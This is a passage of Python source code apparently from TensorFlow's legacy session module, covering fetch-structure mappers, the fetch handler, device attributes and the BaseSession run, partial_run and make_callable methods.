elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
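
  For example, two mappers whose unique fetches are [a, b] and [b, c]
  yield unique_fetches [a, b, c] and value_indices [[0, 1], [1, 2]].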
"""
unique_fetches = []
value_indices = []
seen_fetches = {}
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(id(f))
if j is None:
j = len(seen_fetches)
seen_fetches[id(f)] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
if isinstance(fetches, wrapt.ObjectProxy):
self._fetch_type = type(fetches.__wrapped__)
else:
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = self._fetch_type()
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
results[k] = m.build_results([values[j] for j in vi])
return results
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = feed_handles or {}
self._ops = []
self._fetch_handles = {}
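      # self._ops records, per unique fetch, whether it is an Operation (True)
      # or a Tensor (False); build_results() later uses it to interleave None
      # results for ops with the fetched tensor values.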
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch.experimental_ref()] = fetch.op.inputs[0].dtype
self._final_fetches = [
x for x in self._fetches if x.experimental_ref() not in feeds
]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
          ' Use return values, explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i].experimental_ref() in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i].experimental_ref()].eval()
else:
value = self._feeds.get(self._fetches[i].experimental_ref())
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i].experimental_ref())
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
    A list of each `Tensor`'s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
_python_session_create_counter.get_cell().increase_by(1)
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
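    # If the auto mixed precision graph rewrite was requested globally, enable
    # it on a copy of the config; otherwise record that a session was created
    # without it (presumably so the mixed precision API can warn later).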
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
        Note: depending on the device, the usable memory could be
        substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
    c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = {}
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t.experimental_ref()] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t.experimental_ref()] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
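For illustration, a minimal sketch (assumes `sess` is an open session, `x` is
a `tf.compat.v1.placeholder`, `y` is a tensor computed from it, and `np` is
NumPy):
```python
run_step = sess.make_callable(y, feed_list=[x])
result = run_step(np.ones((2, 2)))  # roughly sess.run(y, feed_dict={x: np.ones((2, 2))})
```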
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
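# For example (node names are illustrative), group 3 captures 'MatMul_1' from
# both '[[Node: MatMul_1 = MatMul[...](a, b)]]' and
# '[[{{node MatMul_1}} = MatMul[...](a, b)]]'.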
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t.deref()._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
